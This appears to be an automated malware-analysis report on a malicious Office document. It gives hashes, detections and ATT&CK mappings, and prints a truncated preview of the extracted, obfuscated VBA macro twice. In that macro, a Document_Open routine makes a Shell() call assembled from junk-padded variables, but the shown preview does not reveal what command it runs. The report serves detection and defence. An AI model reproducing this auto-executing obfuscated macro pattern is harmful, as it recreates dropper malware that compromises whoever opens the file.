Office (OLE) malware analysis — malicious · 5ee80760b8852b8b

MALICIOUS

Office (OLE)

148.6 KB First seen: 2019-05-16

MD5: dad5b8136cbf7ea9d089322e08b77b83 SHA-1: 4ea554668a9c1ec5def19b5dffb5014ee3141baf SHA-256: 5ee80760b8852b8b2f23240d2fa2c7c4f210fec5d55a8ebfd21f370352bfcc45

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OLE document containing a VBA macro that is triggered by the Document_Open event. The macro utilizes a Shell() call, indicating an intent to execute arbitrary code. This is strongly indicative of a downloader or droppper malware. The ClamAV detection name 'Doc.Malware.Valyria-6874597-0' further supports its malicious nature.

Heuristics 5

ClamAV: Doc.Malware.Valyria-6874597-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6874597-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37403 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37403 bytes
SHA-256: `eaa0d63e99d190a5af05a1cd1a9f0e0a8df289844090e9e651ec036a7a22af85`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mUcbnpwcHupc" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function lmWNRcWj() On Error Resume Next MbwYXk = 59088 / Bdicv + 39751 - MHrsz - BTjXBW + vZTsj - (41198 - 53982) mJXKaZ = 54477 / siuMa + 50257 - kDPlc - iVdww + YmAUQk - (53617 - 52470) UndmpM = 77528 / SOSwM + 30819 - fOBMwz - nRJKl + nrEzNI - (18968 - 24433) mFvwJ = 65008 / atpjvP + 8311 - klHKI - BWNiH + Jqsaso - (17543 - 40425) DiUWGd = 22392 / FfVRHw + 26253 - Onkih - CGnkA + qGGjQ - (75780 - 64898) YbBlu = 82450 / maGXlO + 41346 - RowAL - fbNjaJ + lDGcM - (89018 - 55924) End Function Private Function VmLzAoXpswP() On Error Resume Next zuInL = (zliMY + JfErXF * 2564 - nwlPcf + NGzHH + fZlIJE) CawAAD = (wmFkI + waGKAu * 49752 - VzjEn + cWCuXC + uDjAoA) EkIUV = (vqjAKF + uNZSrR * 25739 - YfRzP + IDhOvd + VzTSkJ) wBEzN = (OFakq + AVOiS * 73276 - JZkcmF + MMjuTt + PNLBEq) jjboUp = (jiwVzj + dRvNQY * 54508 - LNFBDW + JLtKal + EPSzf) End Function Private Function HsZAuBGCPj() On Error Resume Next dtKqB = (dBLhwW + zvElLp * 95827 - orjsBn + zMuqmZ + zdiBp) MYwAcE = (uOdaDT + Odcwwr * 44507 - HsCNoT + uhRnn + wUjzXq) msGOTf = (juSaj + KbnwdA * 76285 - roVCih + rCiii + jbbDm) uUQjtL = (fQmlH + vqiIF * 531 - VThRGs + KocRi + ocwfZX) iRWjC = (cZQhuc + QDzOPU * 44763 - vJQjE + JszbB + Wcajj) End Function Private Sub Document_open() On Error Resume Next ZczGbG = 29875 + irXoip * iGXnIX * GhImn * QrkrK * ruTFb - DHVqu * MOmVXz / 37993 * EDWQz zbrHf = 58054 + wvOAvi * PAPmX * YdvTmX * woXDHm * DjijOH - QqHXBl * pDHda / 29045 * WjXUHn KqEvvG = 8576 + ARzqFw * NEzWb * GNASa * cXaozj * rsVVFw - cQXRLC * TAEiS / 51003 * EdEdUH tZWTS = 78453 + zWbjkf * PVJhwn * Yijcd * SUhHY * LRBKqs - SlVuna * fRPGS / 19581 * NUumq UfpUHw = 37472 + OKSpT * ZCkvC * aBEap * lwwGX * DwzFj - fiqMCF * dqhoRK / 83850 * VHTbOf mksaj = 41769 + aZHlL * EUjNQQ * qBTsRs * QBDoTW * EzHhfl - ajKKT * lsWUL / 80218 * hkQAI Shell "" + LsJvBjVfXP + mowkmdHk + CVar("c") + hXrhzHPGUB + vispMFhbG + kdjnkkkf + UFlQZp + ajcHzvhai + zBBLflmcirH + FssPAbNPKB + OzoDEi + RGZtVAn + WuQbfklHaE + cEzLKkV + akZtA + AwclK + msHzLGDMoQ + LawqnGP + XImSlXYUWJ + cOwzmLYDJi, 0 LiodiR = 90078 + UVpuSV * SJUvAc * stVbb * VGLsM * GDjup - PcDHZ * jQUFu / 80595 * vEvpuI End Sub Private Function oOnQBzpX() On Error Resume Next zMGjd = FcvbNO - WFaNM - 61503 / rqNjV - KnjCp * aziCHJ / rSjzFC + KzjPb / 31959 - iKHzXO + 17553 + Swslh * VoCSEj * uHrIjG nOhuD = WUbiW - MjamK - 90996 / GfwvZ - EiHGib * izmtV / RCUpHS + kDkuzw / 96316 - YWrSHR + 97224 + POtGSY * ujQdd * lqpcb Tlftot = Tfltip - BEzBi - 46935 / buKod - SLcKYN * MSDcNO / iplQn + pizuQV / 98961 - srVFKB + 50585 + DaVQr * iBUoQ * UlJtA DfzIhL = HiWGDq - UkciFO - 71403 / LUkviP - zAFwq * zNSQSD / nTDlY + vRUGR / 5760 - NUcYlc + 62269 + iWBHz * UWKSn * fCrRz End Function Private Function RmBhWczQFGvPrP() On Error Resume Next LizoW = 42615 + zohbM * zZbhO * BTEimA * jKWOi * SKWTM - NXvoXO * Yiocv / 5115 * LjtGzM qLaZC = 5773 + FdGPzB * GfhPh * irhbMj * jQPTz * DjjNwM - iZKWf * zpcNZ / 69800 * LbwdwN rKrER = 53975 + SZdqj * nYEQmh * nGzmT * QaTkH * Mtzrd - WhzLY * tRlLvj / 69697 * nCWkMF ivLZG = 23557 + dvWNXz * zXKRfV * iaZYaq * SELVT * QuElnp - EqCVIn * CizNj / 424 * zUlAjV pqpdrv = 51675 + uuTiSF * zHNzM * npnUL * FbQzIE * taUMq - oDupPK * BkhlYi / 61824 * CBCIfO znrhKU = 78518 + QLmPj * FFfHbQ * qIzvib * dZWJY * OGKloz - iRKpij * Bpkjo / 23574 * Jftmj End Function Private Function BoqZzKYvtEcCVO() On Error Resume Next fTmMSu = 8188 + ltmvo * iJGBO * IfkXRQ * FBwrFZ * QSEzG - HtDpXi * tujJY / 79158 * ZAiOu SzpiBL = 41074 + znUEz * lKzLwf * KUzSbH * UTUir * ihrOSJ - uwlqMZ * LLojKZ / 26979 * cqQaD zWsIYE = 1407 + vZzMzf * dStVz * ztXqdD * WLzbUX * XiAuf - EqqNp * YVfPT / 21086 * rBdURv ... (truncated)

SHA-256: eaa0d63e99d190a5af05a1cd1a9f0e0a8df289844090e9e651ec036a7a22af85

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mUcbnpwcHupc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lmWNRcWj()
On Error Resume Next
   MbwYXk = 59088 / Bdicv + 39751 - MHrsz - BTjXBW + vZTsj - (41198 - 53982)
   mJXKaZ = 54477 / siuMa + 50257 - kDPlc - iVdww + YmAUQk - (53617 - 52470)
   UndmpM = 77528 / SOSwM + 30819 - fOBMwz - nRJKl + nrEzNI - (18968 - 24433)
   mFvwJ = 65008 / atpjvP + 8311 - klHKI - BWNiH + Jqsaso - (17543 - 40425)
   DiUWGd = 22392 / FfVRHw + 26253 - Onkih - CGnkA + qGGjQ - (75780 - 64898)
   YbBlu = 82450 / maGXlO + 41346 - RowAL - fbNjaJ + lDGcM - (89018 - 55924)
End Function
Private Function VmLzAoXpswP()
On Error Resume Next
   zuInL = (zliMY + JfErXF * 2564 - nwlPcf + NGzHH + fZlIJE)
   CawAAD = (wmFkI + waGKAu * 49752 - VzjEn + cWCuXC + uDjAoA)
   EkIUV = (vqjAKF + uNZSrR * 25739 - YfRzP + IDhOvd + VzTSkJ)
   wBEzN = (OFakq + AVOiS * 73276 - JZkcmF + MMjuTt + PNLBEq)
   jjboUp = (jiwVzj + dRvNQY * 54508 - LNFBDW + JLtKal + EPSzf)
End Function
Private Function HsZAuBGCPj()
On Error Resume Next
   dtKqB = (dBLhwW + zvElLp * 95827 - orjsBn + zMuqmZ + zdiBp)
   MYwAcE = (uOdaDT + Odcwwr * 44507 - HsCNoT + uhRnn + wUjzXq)
   msGOTf = (juSaj + KbnwdA * 76285 - roVCih + rCiii + jbbDm)
   uUQjtL = (fQmlH + vqiIF * 531 - VThRGs + KocRi + ocwfZX)
   iRWjC = (cZQhuc + QDzOPU * 44763 - vJQjE + JszbB + Wcajj)
End Function
Private Sub Document_open()
On Error Resume Next
   ZczGbG = 29875 + irXoip * iGXnIX * GhImn * QrkrK * ruTFb - DHVqu * MOmVXz / 37993 * EDWQz
   zbrHf = 58054 + wvOAvi * PAPmX * YdvTmX * woXDHm * DjijOH - QqHXBl * pDHda / 29045 * WjXUHn
   KqEvvG = 8576 + ARzqFw * NEzWb * GNASa * cXaozj * rsVVFw - cQXRLC * TAEiS / 51003 * EdEdUH
   tZWTS = 78453 + zWbjkf * PVJhwn * Yijcd * SUhHY * LRBKqs - SlVuna * fRPGS / 19581 * NUumq
   UfpUHw = 37472 + OKSpT * ZCkvC * aBEap * lwwGX * DwzFj - fiqMCF * dqhoRK / 83850 * VHTbOf
   mksaj = 41769 + aZHlL * EUjNQQ * qBTsRs * QBDoTW * EzHhfl - ajKKT * lsWUL / 80218 * hkQAI
Shell "" + LsJvBjVfXP + mowkmdHk + CVar("c") + hXrhzHPGUB + vispMFhbG + kdjnkkkf + UFlQZp + ajcHzvhai + zBBLflmcirH + FssPAbNPKB + OzoDEi + RGZtVAn + WuQbfklHaE + cEzLKkV + akZtA + AwclK + msHzLGDMoQ + LawqnGP + XImSlXYUWJ + cOwzmLYDJi, 0
   LiodiR = 90078 + UVpuSV * SJUvAc * stVbb * VGLsM * GDjup - PcDHZ * jQUFu / 80595 * vEvpuI
End Sub
Private Function oOnQBzpX()
On Error Resume Next
   zMGjd = FcvbNO - WFaNM - 61503 / rqNjV - KnjCp * aziCHJ / rSjzFC + KzjPb / 31959 - iKHzXO + 17553 + Swslh * VoCSEj * uHrIjG
   nOhuD = WUbiW - MjamK - 90996 / GfwvZ - EiHGib * izmtV / RCUpHS + kDkuzw / 96316 - YWrSHR + 97224 + POtGSY * ujQdd * lqpcb
   Tlftot = Tfltip - BEzBi - 46935 / buKod - SLcKYN * MSDcNO / iplQn + pizuQV / 98961 - srVFKB + 50585 + DaVQr * iBUoQ * UlJtA
   DfzIhL = HiWGDq - UkciFO - 71403 / LUkviP - zAFwq * zNSQSD / nTDlY + vRUGR / 5760 - NUcYlc + 62269 + iWBHz * UWKSn * fCrRz
End Function
Private Function RmBhWczQFGvPrP()
On Error Resume Next
   LizoW = 42615 + zohbM * zZbhO * BTEimA * jKWOi * SKWTM - NXvoXO * Yiocv / 5115 * LjtGzM
   qLaZC = 5773 + FdGPzB * GfhPh * irhbMj * jQPTz * DjjNwM - iZKWf * zpcNZ / 69800 * LbwdwN
   rKrER = 53975 + SZdqj * nYEQmh * nGzmT * QaTkH * Mtzrd - WhzLY * tRlLvj / 69697 * nCWkMF
   ivLZG = 23557 + dvWNXz * zXKRfV * iaZYaq * SELVT * QuElnp - EqCVIn * CizNj / 424 * zUlAjV
   pqpdrv = 51675 + uuTiSF * zHNzM * npnUL * FbQzIE * taUMq - oDupPK * BkhlYi / 61824 * CBCIfO
   znrhKU = 78518 + QLmPj * FFfHbQ * qIzvib * dZWJY * OGKloz - iRKpij * Bpkjo / 23574 * Jftmj
End Function
Private Function BoqZzKYvtEcCVO()
On Error Resume Next
   fTmMSu = 8188 + ltmvo * iJGBO * IfkXRQ * FBwrFZ * QSEzG - HtDpXi * tujJY / 79158 * ZAiOu
   SzpiBL = 41074 + znUEz * lKzLwf * KUzSbH * UTUir * ihrOSJ - uwlqMZ * LLojKZ / 26979 * cqQaD
   zWsIYE = 1407 + vZzMzf * dStVz * ztXqdD * WLzbUX * XiAuf - EqqNp * YVfPT / 21086 * rBdURv

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.